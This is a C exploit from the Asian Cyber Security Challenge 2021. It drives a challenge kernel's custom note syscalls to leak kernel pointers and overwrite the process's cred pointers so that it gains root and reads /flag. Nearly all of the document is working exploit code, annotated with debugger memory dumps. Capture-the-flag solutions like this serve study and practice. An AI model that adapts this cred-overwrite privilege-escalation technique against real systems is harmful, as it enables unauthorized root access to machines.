Asian Cyber Security Challenge 2021 Exploits
#include <stdio.h> | |
#include <fcntl.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <sys/types.h> | |
#include <sys/syscall.h> | |
#define ADD 548 | |
#define DEL 549 | |
#define SHOW 550 | |
#define COPY 551 | |
#define CURR 552 | |
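/*
 * Block until one byte arrives on stdin so the process (and the kernel state
 * it has set up) can be inspected from a debugger before it continues.
 *
 * Fixes vs. the original: the prompt is flushed so it is visible when stdout
 * is a pipe, `a` is initialised, and the read() result is no longer ignored.
 *
 * NOTE(review): a file-scope identifier beginning with '_' is reserved for the
 * implementation in C; the name is kept because main() calls it as-is.
 */
void _pause(){
    char a = 0;
    printf("[+] Press anything to continue\n");
    fflush(stdout);
    if (read(0, &a, 1) < 0) {
        perror("read");
    }
}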
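/*
 * Proof-of-concept for the ACSC 2021 kernel challenge.  It drives the
 * challenge's custom note syscalls (ADD/DEL/SHOW/COPY/CURR, numbers per the
 * #defines above) with a user-controlled buffer; per the author's comments the
 * SHOW step leaks kernel pointers into that buffer and the later ADD/COPY steps
 * feed modified pointers back, apparently so that the task's cred pointers end
 * up rewritten.  The offsets (0x40, 0x78..0x110, 0x410) and the value
 * current+0x6a8 are specific to the challenge kernel build and are reproduced
 * verbatim from the debugger notes below.
 *
 * Changes vs. the original: malloc()/open()/read() results are checked, the
 * flag buffer is NUL-terminated before puts() (the original could read past a
 * 100-byte unterminated buffer), the integer-to-pointer store gets an explicit
 * cast, void-pointer arithmetic (a GNU extension) is done via char*, and the
 * note buffer is freed.  The syscall sequence itself is unchanged.
 *
 * Returns 0 on completion, 1 if the note buffer could not be allocated.
 */
int main(){
    void *current = (void *)syscall(CURR);
    printf("[+] current: %p\n", current);
    /* Value written into every leaked pointer slot below. */
    void *target = (char *)current + 0x6a8;

    // Copy to note
    char *s = malloc(0x1000);
    if (!s) {
        perror("malloc");
        return 1;
    }
    printf("[+] s: %p\n", s);
    memset(s, 'A', 0x408);
    s[0x408] = '\x00';
    syscall(ADD, s);

    // Leak pointers
    syscall(SHOW, s);

    // Overwrite * cred
    // 81:0408│ 0x186bf88 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
    // 82:0410│ 0x186bf90 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */
    *(void **)&s[0x410] = target;
    *(void **)&s[0x78] = target;
    *(void **)&s[0x80] = target;
    *(void **)&s[0x88] = target;
    *(void **)&s[0x90] = target;
    *(void **)&s[0x110] = target;
    syscall(ADD, s);

    // Setup cred
    // 08:0040│ 0xffff8cfc82456880 ◂— 0x1ffffffffff
    // 09:0048│ 0xffff8cfc82456888 ◂— 0
    // ... ↓ 5 skipped
    // 0f:0078│ 0xffff8cfc824568b8 —▸ 0xffff8cfc82404160 ◂— add dword ptr [rax], eax /* 0x100000001 */
    // 10:0080│ 0xffff8cfc824568c0 —▸ 0xffff8cfc823f1e80 ◂— add eax, 0x2000000 /* 0x200000005 */
    // 11:0088│ 0xffff8cfc824568c8 —▸ 0xffffffff99a4d5a0 ◂— 1
    // 12:0090│ 0xffff8cfc824568d0 —▸ 0xffff8cfc813e2cc0 ◂— add eax, 0x1000000 /* 0x100000005 */
    // 22:0110│ 0xffff8b1082455950 —▸ 0xffff8b10824559c0 ◂— 0
    memset(s, '\x00', 0x400);
    *(void **)&s[0x40] = (void *)0x1ffffffffff;   /* value taken from the 0x0040 note above */
    *(void **)&s[0x78] = target;
    *(void **)&s[0x80] = target;
    *(void **)&s[0x88] = target;
    *(void **)&s[0x90] = target;
    *(void **)&s[0x110] = target;
    syscall(COPY, s);

    /* Read and print the flag; one extra byte keeps room for the terminator
     * that puts() requires, and a short read is terminated at its length. */
    char flag[101] = {0};
    int fd = open("/flag", O_RDONLY);
    if (fd < 0) {
        perror("open /flag");
    } else {
        ssize_t got = read(fd, flag, sizeof flag - 1);
        if (got < 0) {
            perror("read /flag");
        } else {
            flag[got] = '\0';
            puts(flag);
        }
        close(fd);
    }

    // Pause to debug
    _pause();
    free(s);
    return 0;
}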